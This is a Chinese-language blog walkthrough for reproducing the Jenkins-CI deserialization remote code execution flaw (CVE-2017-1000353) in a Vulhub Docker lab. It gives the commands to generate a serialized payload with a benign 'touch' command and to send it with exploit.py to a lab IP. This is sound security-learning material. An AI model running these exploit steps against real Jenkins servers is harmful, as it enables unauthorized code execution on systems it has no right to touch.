程序员经验分享-hwhale

利用Vulnhub复现漏洞 - Jenkins-CI 远程代码执行漏洞(CVE-2017-1000353)

2023-11-05

Vulnhub官方复现教程

https://vulhub.org/#/environments/jenkins/CVE-2017-1000353/

漏洞原理

参考阅读 https://blogs.securiteam.com/index.php/archives/3171

复现过程

启动环境

https://blog.csdn.net/JiangBuLiu/article/details/93853056
进入路径为

cd /root/vulhub/jenkins/CVE-2017-1000353

搭建及运行漏洞环境:

docker-compose build && docker-compose up -d

用时:6分钟
环境启动后,访问http://your-ip:8080即可看到jenkins已成功运行,无需手工安装。
在这里插入图片描述

漏洞复现

生成序列化字符串

参考https://github.com/vulhub/CVE-2017-1000353,首先下载CVE-2017-1000353-1.1-SNAPSHOT-all.jar,这是生成POC的工具。
执行下面命令,生成字节码文件:

java -jar CVE-2017-1000353-1.1-SNAPSHOT-all.jar jenkins_poc.ser "touch /tmp/CVE-2017-1000353_is_success"

执行上述代码后,生成jenkins_poc.ser文件,这就是序列化字符串。
在这里插入图片描述

发送数据包,执行命令

下载exploit.py
【注意】上面链接里的exploit代码需要将Proxies里面的内容注释掉
在这里插入图片描述
否则会报错ConnectionRefusedError: [Errno 111] Connection refused
在这里插入图片描述

教程提示要【python3】执行(但是我用2也成功了,如果失败试试换成【python3】

python exploit.py http://192.168.236.138:8080 jenkins_poc.ser

在这里插入图片描述
将刚才生成的字节码文件发送给目标

检验

进入docker容器

docker-compose exec jenkins bash

发现/tmp/success成功被创建,说明命令执行漏洞利用成功:
在这里插入图片描述

本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系:hwhale#tublm.com(使用前将#替换为@)

渗透

vulnhub

利用Vulnhub复现漏洞 - Jenkins-CI 远程代码执行漏洞(CVE-2017-1000353) 的相关文章

  • 【vulnhub靶场之DC2靶机渗透】

    目录 一 前言 二 渗透过程 一 前言 大家好 xff0c 又到了快乐的学习时光了 xff0c 最近也是沉迷于DC系列的靶场 xff0c 每一次成功拿下靶场后都会学习和总结到很多的东西 今天的受害者是DC 2靶场 xff0c 话不多说 xf

  • vulnhub-ica1-通关流程 // Kali & 靶场 & 渗透 & Linux

    vulnhub ica1 通关流程 演示视频 xff1a https www bilibili com video BV1mG411b7to share source 61 copy web amp vd source 61 64a9139

  • Frp某场景下实现多层代理

    注 由于传播 利用本文章所提供的信息而造成的任何直接或者间接的后果及损失 均由使用者本人负责 本文作者不为此承担任何责任 一旦造成后果请自行承担 目录 frp简介 部分配置参数说明 实验场景 实验场景 实验环境 实验步骤 第一层隧道 第二层

  • vulnhub靶机Thoth-Tech

    下载地址 https download vulnhub com thothtech Thoth Tech ova 主机发现 arp scan l 目标 192 168 21 148 端口扫描 nmap min rate 10000 p 19

  • 利用Vulnhub复现漏洞 - HTTPoxy漏洞(CVE-2016-5385)

    HTTPoxy漏洞 CVE 2016 5385 Vulnhub官方复现教程 漏洞原理 复现过程 启动环境 漏洞复现 端口设置 浏览器设置 BurpSuit设置 发出请求 Vulnhub官方复现教程 https vulhub org envi

  • Hashcat的使用手册总结

    简介 Hashcat是自称世界上最快的密码恢复工具 它在2015年之前拥有专有代码库 但现在作为免费软件发布 适用于Linux OS X和Windows的版本可以使用基于CPU或基于GPU的变体 支持hashcat的散列算法有Microso

  • 【Vulnhub】搭建Vulnhub靶机

    一 Vulnhub介绍 Vulnhub它是一个提供各种网络攻防靶场的平台 里面大部分的环境是要用VMware或者VirtualBox打开运行的 二 下载 去vulnhub的官网 https www vulnhub com可以看到各种镜像 点

  • 利用Vulnhub复现漏洞 - JBoss 4.x JBossMQ JMS 反序列化漏洞(CVE-2017-7504)

    JBoss 4 x JBossMQ JMS 反序列化漏洞 CVE 2017 7504 Vulnhub官方复现教程 漏洞原理 复现过程 启动环境 漏洞复现 发送POC 通过命令 通过 BurpSuit 发送 检测POC是否成功 Vulnhub

  • VulnHub-Sick0s1.2

    目录 简介 信息收集 漏洞发现 漏洞利用 权限提升 总结 简介 该靶机是Sick0s系列的第二个靶机 总体来说不难 提权那里需要花点时间 毕竟linpeas脚本没有将计划任务标红 总之我个人尝试了很久内核提权 浪费了大量时间 而且不知道是w

  • VulnHubBreach1.0[渗透测试]新手必看

    靶机下载地址 https download vulnhub com breach Breach 1 0 zip 前言 将下载好的靶场导入VMware 虚拟机设置网络模式为nat模式 即可开启渗透 阅读readme txt 作为多部分系列的第

  • 利用Vulnhub复现漏洞 - GoAhead 远程命令执行漏洞(CVE-2017-17562)

    GoAhead 远程命令执行漏洞 CVE 2017 17562 Vulnhub官方复现教程 漏洞原理 复现漏洞 启动环境 漏洞复现 动态链接库源码 编译so文件 发送payload Vulnhub官方复现教程 https vulhub or

  • 关于《Python黑帽子:黑客与渗透测试编程之道》的学习笔记

    本篇文章是学习 Python黑帽子 黑客与渗透测试编程之道 的笔记 会持续地将书上的代码自己敲一遍 从而让自己对Python的安全编程有更多的了解 同时希望各位可以给给建议 不足之处太多了 第一章 设置Python环境 Kali Linux

  • 利用Vulnhub复现漏洞 - mini_httpd任意文件读取漏洞(CVE-2018-18778)

    mini httpd任意文件读取漏洞 CVE 2018 18778 Vulnhub官方复现教程 漏洞原理 复现过程 启动环境 端口设置 浏览器设置 BurpSuit设置 漏洞复现 Vulnhub官方复现教程 https vulhub org

  • 渗透测试 面试笔试题

    Powered By 行云博客 https www xy586 top 原创文章 转载请附上原文出处链接和本声明 原文链接 https blog csdn net qq 41679358 article details 109019491

  • Deathnote

    Deathnote 1 主机发现 arp scan l 2 扫描端口 nmap Pn sV P A 192 168 80 132 开放了80 22端口 3 访问80端口 修改host文件访问80端口时进行了跳转到deathnote vuln

  • HackInOS靶机渗透writeup

    HackInOS靶机渗透writeup 0x00准备测试环境 导入下载好的HackInOS ova文件后 将网络设置成桥接模式 并使用DHCP分配IP 成功后打开的靶机图如下 0x01渗透过程 使用nmap扫描确定目标机器IP nmap s

  • SQL SERVER的注入要点

    SQL SERVER的注入要点 一 SQLServer数据库的查询语句 函数查询 1 select version 查询数据库的版本 2 select host name 查询主机名 如果是用navicat远程连接的话 主机名是本地的名字

  • XSS 跨站脚本

    XSS 跨站脚本 一 什么是XSS XSS Cross site Scripting 中文名跨站脚本攻击 其原理是攻击者利用浏览器执行前端代码 HTML CSS JavaScript 的特性 将恶意的JavaScript代码插入到页面中 当

  • CVE-2018-2894WebLogic未授权任意文件上传

    CVE 2018 2894WebLogic未授权任意文件上传 这个洞的限制就比较多了 限制版本 Oracle WebLogic Server版本 10 3 6 0 12 1 3 0 12 2 1 2 12 2 1 3 限制配置 该漏洞的影响

  • 【精选】ATK&CK红队评估实战靶场三(超详细思路过程)

    博主介绍 博主介绍 大家好 我是 hacker routing 很高兴认识大家 主攻领域 渗透领域 应急响应 ATK CK红队评估实战靶场 VulnHub靶场复现 面试分析 点赞 评论 收藏 养成习惯 一键三连 欢迎关注 一起学习 一起讨论

随机推荐

  • Linux服务器开发——epoll模式web服务器代码

    Linux服务器开发 epoll模式web服务器代码 1 main c 2 epoll server c 2 1 初始化epoll树 初始化监听的描述符 2 2 接受新的连接请求并上树 2 3 已经在树上的进行读数据 2 4 http请求解

  • html的初步认识

    HTML 英文 Hyper Text Markup Languag的缩写 中文翻译为 超文本标记语言 主要通过HTML标签对网页中的文本 图片 声音等等内容进行一个描述 html的骨架

  • 布线问题(队列式分支限界)

    计算机算法设计与分析 第5版 王晓东著 p178 0 电路板中可行的方格 1 障碍物 2 起点 是按课本上来的 初始起点设为2 是为了和 0 1进行区分 起点 1 1 终点 4 6 1 path 数组是存放的起点到终点的路径方格 2 电路板

  • Vim使用学习以及ideaVim(持续补充)

    Vim使用学习以及ideaVim 我的ideaVim配置 文章目录 Vim使用学习以及ideaVim 方向 nomral模式 进入插入模式 删除命令 粘贴命令 拷贝命令 替换命令 修改命令 motion 表示操作范围的指令 文件信息 可视模

  • form表单传递实体类对象,后台接收

    1 新建实体类 public class Student String Idnumber String Studentnumber String username String password String name String int

  • FreeRTOS任务的挂起和恢复

    目录 说明 一 任务挂起与恢复 1 1 什么是任务挂起 1 2 任务挂起函数 1 3 什么是任务恢复 1 4 任务恢复函数 1 5 什么是中断任务恢复函数 1 6 中断任务恢复函数 二 任务挂起与恢复实例代码 任务中 2 1 主要代码 2

  • Vue proxy 配置跨域

    vue config js文件 const defineConfig require vue cli service module exports defineConfig transpileDependencies true devSer

  • 微信小程序和微信小游戏的区别

    本人小程序 小游戏 开发新手 看了几天文档 才大概搞明白微信小程序和微信小游戏的区别 首先大家口中所说的 小程序 这个概念有两个意思 一种是 小程序平台下的全部类型的项目 这样的话 就是不区分小程序项目和小游戏项目的概念 是大家一般口中所说

  • SQL语句(多表关系)

    第1章 多表关系实战 1 1 实战1 省和市 l 方案1 多张表 一对多 l 方案2 一张表 自关联一对多 1 2 实战2 用户和角色 l 多对多关系 1 3 实战3 角色和权限 l 多对多关系 1 4 实战4 客户和联系人 可选 l 一对

  • 什么事LLVM和Clang?Clang与GCC有什么区别?Clang如何使用?

    这个问题主要讲Xcode编译器的认知 在学习iOS之前有必要学习一下Objective C的编译环境 在了解LLVM和Clang之前 先得了解一下什么是编译器 编译器是一种计算机程序 它将某种编程语言 高级编程语言 写成的源代码转换成另一种

  • 马哥SRE第八周课程作业

    redis lvs nginx 一 redis搭建哨兵原理和集群实现 1 1 哨兵 1 1 1 redis Sentinel介绍 1 1 2 实现哨兵架构 1 1 3 哨兵需要先实现主从复制 1 1 4 编辑哨兵配置 1 1 5启动哨兵服务

  • Debian的服务(service)管理

    相比较RH系列的ntsysv Debian也有个类似的服务管理软件rcconf 这是个很简单的管理软件 通过文本窗口管理 想使用他同样需要下载安装 apt get install rcconf 然后在shell下输入rcconf就可以了 当

  • 蓝桥算法训练-拿金币

    问题描述 有一个N x N的方格 每一个格子都有一些金币 只要站在格子里就能拿到里面的金币 你站在最左上角的格子里 每次可以从一个格子走到它右边或下边的格子里 请问如何走才能拿到最多的金币 输入格式 第一行输入一个正整数n 以下n行描述该方

  • CentOS 7部署nginx 离线安装nginx 在线安装nginx(nginx安装详细教程)

    CentOS 7部署nginx 离线安装nginx 在线安装nginx nginx安装详细教程 文章目录 CentOS 7部署nginx 离线安装nginx 在线安装nginx nginx安装详细教程 1 联网安装nginx 2 离线安装N

  • 全面文档格式处理工具Aspose最新中文教程指南请查收!

    Aspose Total是一个完整的文档管理工具包 可让您创建 操作和转换各种Microsoft Office文档格式 PDF Web和图像格式 同时还使您可以处理电子邮件 OCR 3D和条形码等等 不仅如此 Aspose Total适用于

  • 记录一linux命令:xargs

    转自 http www sudu cn info html edu linux 20080102 290238 html xargs 大多数 Linux 命令都会产生输出 文件列表 字符串列表等 但如果要使用其他某个命令并将前一个命令的输出

  • 关于数据表空间问题总结

    oracle经常需要查数据库表空间大小 使用率 加表空间等 这里总结我经常使用的语句 一 数据表空间相关 查询所有表空间的使用情况 SELECT d tablespace name Name d status Status TO CHAR

  • 姓名编码查询

    内容较多 查找时请使用 ctrl F 组合键查找 本汉字代码表摘自 字符集和信息编码 国家标准汇编 中国标准出版社 1998年编 谢绝负责法 律责任 啊 1601 阿 1602 吖 6325 嗄 6436 腌 7571 锕 7925 埃 1

  • 测试如何转开发系列(四)

    囫囵吞枣法 是快速学习的核心方法 用最快的时间 把最主要知识点都学会 学习的第一步 选资料一定选择书籍 纸质的和电子书最合适 因为书籍相对内容更系统 而且内容更丰富 要选择基础入门的书籍 不要选择深入研究这种的 一深入就出不来了 深入就代表

  • 利用Vulnhub复现漏洞 - Jenkins-CI 远程代码执行漏洞(CVE-2017-1000353)

    Jenkins CI 远程代码执行漏洞 CVE 2017 1000353 Vulnhub官方复现教程 漏洞原理 复现过程 启动环境 漏洞复现 生成序列化字符串 发送数据包 执行命令 检验 Vulnhub官方复现教程 https vulhub

热门标签